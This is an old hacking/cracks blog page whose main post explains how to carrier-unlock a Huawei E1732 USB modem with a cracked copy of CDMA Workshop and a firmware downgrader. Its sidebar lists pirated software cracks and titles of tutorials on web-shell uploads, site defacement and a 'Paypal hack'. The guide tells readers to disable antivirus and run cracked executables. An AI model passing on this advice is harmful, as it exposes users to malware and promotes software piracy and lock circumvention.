http://hostingwebserver.com/extras.html

Note :- if u face any problem in this post , u sent ur problem by comment
Read More
Posted in Hacking Tutorials | No comments

Friday, 20 July 2012

Unlock Huawei E1732 Idea Net Setter Unlock Software And Firmware

Posted on 14:54 by Unknown


If you are searching for how to unlock huawei e1732 data card of idea net setter then you are at
correct place. Thousands of users are using huawei e1732 idea net setter for accessing internet and
almost all of them have tried to unlock the net setter so that they can use any SIM card in it to get
internet connectivity. Yesterday i have unlocked 2 modems of e1732 Idea Net Setter and i can say
that the solution which i will be sharing is 100% tested by me and working perfectly.



Note: Huawei e1732 Idea Net Setter is using idea net setter e173du-1 hardware (see following
screen shot)



If you have any doubt or facing any problem at any moment, put your comment after this post. So
without wasting time refer below step by step guide with screen shots for you, which will help you to
unlock your e1732 modem.
Prerequisites (Things which will be required as a raw material):
1. An internet connection (in case net setter data card require device drive then it can download
them from internet directly).
2. Disable Antivirus if you have any (I am using Eset Nod32 which i have disabled during unlock
procedure)
3. You must have to download two files, 1) Download CDMA Workshop Full version and
2) Huawei e1732 downgrade firmware. (7zip will be needed to unzip the cdma workshop files)
4. Make sure that your modem is detected in your PC and you should know the PORT number
on which your modem is connected.
5. Insert any SIM in modem Excepting idea (don’t insert idea SIM).


Steps To Unlock Huawei E1732 Idea Net Setter


1. Disable Antivirus till the time unlocking is finished, because the crack of “CDMA Workshop
    v2.7” will be automatically deleted by your antivirus software.
2. Insert Idea Net Setter modem in you PC/Laptop.
3. Go to My Computer >> Properties >> Device Manager >> Ports (COM & LPT) >> HUAWEI
    Mobile Connect – 3G Application Interface (COM[X]), here X is the port number appear in
    your system.Note down the com port number in which your huawei e1732 idea net
    setter is connected.
4. Now Open “CDMA Workshop v2.7.0.exe“.


Under the “Main” tab Select Port number(“COM Settings (AT mode)”) which you have
get in step 3 and click on Connect button.

Go to “Security” tab > Type “000000” in the blank box under SPC. Click
on SPC button >> Send button with Default (nv_read) as SPC.






Now Go to “Memory” tab and in NV Items section Click on Read button. A Conform
box will appear, just click OK and you will see a NV Items Backup box. In the box “Last
NV Item” type “9999” and Click OK. Save the file by giving a file name you like (i.e.
E1732Unlockfile etc.)



Once the buffer reach 100% your file is saved successfully, now click OK on Information
box.
Minimize the “CDMA Workshop v2.7.0.exe” application.

Now Open E1732 Downgrader application and run it. Accept the license agreement
and click Next >> Wait for a few seconds until the search for your modem finishes.
(Don’t mark “Auto remove the device after update” check box) and click next and Start


At the end of Downloading Programs… you will get an “Update Failure!” error message
box, just go ahead and click OK and then Finish.
Again Maximize “CDMA Workshop v2.7.0.exe” application.
Go to “Main” tab and Click on Finish button – Unplug your idea net setter now.
Again Plugin your idea net setter modem in the computer and again find
the Port number from device manager (as discussed in step 3)
Now go to “CDMA Workshop v2.7.0.exe” and select the Port that you noted from
your device manager
Go to “Main” tab and click on “Connect”.
Go to “Memory” tab and click on NV Items >> Write button. On confirm box click “OK”
>> “Open” dialog box will appear. Choose the file that you saved before and wait till the
buffer reaches to “100%” a “Information” dialog box appears with a success message.
Click “OK” and go to “Main” tab >> Disconnect.
Now close “CDMA Workshop v2.7.0” >> A “Confirm” dialogue box will appear >> Click
“NO”
Close everything and now enable your Antivirus.That’s it! Your Idea Netsetter E1732 is
unlocked successfully.









Read More
Posted in Unlock Datacard | No comments
Newer Posts Older Posts Home
Subscribe to: Posts (Atom)

Popular Posts

  • Grey Hat Hacking 2nd Edition !! Mcgraw Hill
       Grey Hat Hacking 2nd Edition  Mc--aw-Hill Osborne Media 2nd Edition | ISBN: 0071495681 | PDF | 550 pages | 11.2 MB Book Description “A fa...
  • LENOVO ONE KEY RECOVERY PROBLEM SOLUTION FOR WINDOWS 8
    LENOVO ONE KEY RECOVERY  PROBLEM SOLUTION FOR WINDOWS 8 NOTE- this solution only for windows 8 lenovo pc+laptop. or if ur recovery not work ...
  • Hacking for Dummies: test network security !! Stuart McClure
    Hacking for Dummies: Test Network Security Published: 2004 | 387 Pages | PDF |SIZE 10 MB Book Description A new edition of the bestselling g...
  • Microsoft Toolkit v2.4.4 Final "Windows 8 & Ms office 2013 activator" !! Crack
    Microsoft Toolkit Microsoft Toolkit v2.4.1 | FINAL  | Size 38 MB ================ [Software INFO:] ================ This is a set of tools a...
  • Brute Force Cracking the Data Encryption Standard !! Matt Curtin
    Brute Force Cracking the Data Encryption Standard Published: 2005 | ISBN10 0387201092 | 283 Pages | PDF |SIZE 2 MB Book Description In 1996,...
  • Designing BSD Rootkits An Introduction to Kernel Hacking !! Joseph Kong
    Designing BSD Rootkits An Introduction to Kernel Hacking Published: 2007 | ISBN10 1593271425 | 144 Pages | PDF |SIZE 8 MB Book Description T...
  • Syngress SQL Injection Attacks & Defense !! Justin Clarke
    Syngress SQL Injection Attacks & Defense Published: 2012 | 576 Pages | ISBN: 1597499633 | PDF | 10MB Book Description SQL Injection Atta...
  • Windows 8 Hacks & secrets 2013 !! Preston Gralla
    Windows 8 Hacks & secrets 2013 Published: 2013 | ISBN10 1449325750 | 422 Pages | PDF |SIZE 41 MB Book Description Windows 8 is quite dif...
  • CCleaner Professional Business Edition 4.03 !! Crack
    CCleaner  Professional | Business Edition 4.03.4151 | 4.2 MB ================ [Software INFO:] ================ CCleaner a utility for clean...
  • PowerISO v5.5 Final With Key !! Crack
    PowerIso poweriso v5.5 | size 5.4 MB ================ [Software INFO:] ================ New Features in v5.4:- Improve user interface Suppor...

Categories

  • book
  • coding
  • CRACKS
  • Game
  • hacking
  • Hacking Tutorials
  • Other
  • software
  • SOLUTIONS
  • Unlock Datacard
  • Utility
  • Virus

Blog Archive

  • ►  2013 (23)
    • ►  December (1)
    • ►  July (18)
    • ►  May (1)
    • ►  March (3)
  • ▼  2012 (27)
    • ▼  November (2)
      • Windiws 8 pro Activator 100% working
      • Online Random Password Generator
    • ►  September (2)
      • List of Command Prompt Commands
      • Make USB-Pendrive Virus
    • ►  August (4)
      • Hack Website By Uploding shell – Tutorial
      • How To Upload Shell and Deface Website – Tutorial
      • How To Hack Web Servers - tutorial
      • How To Hack website With SQL Injection : Full Tuto...
    • ►  July (3)
      • Paypal Hack By JavaScript
      • Unlock Huawei E1732 Idea Net Setter Unlock Softwar...
    • ►  March (2)
    • ►  February (2)
    • ►  January (12)
Powered by Blogger.

About Me

Unknown
View my complete profile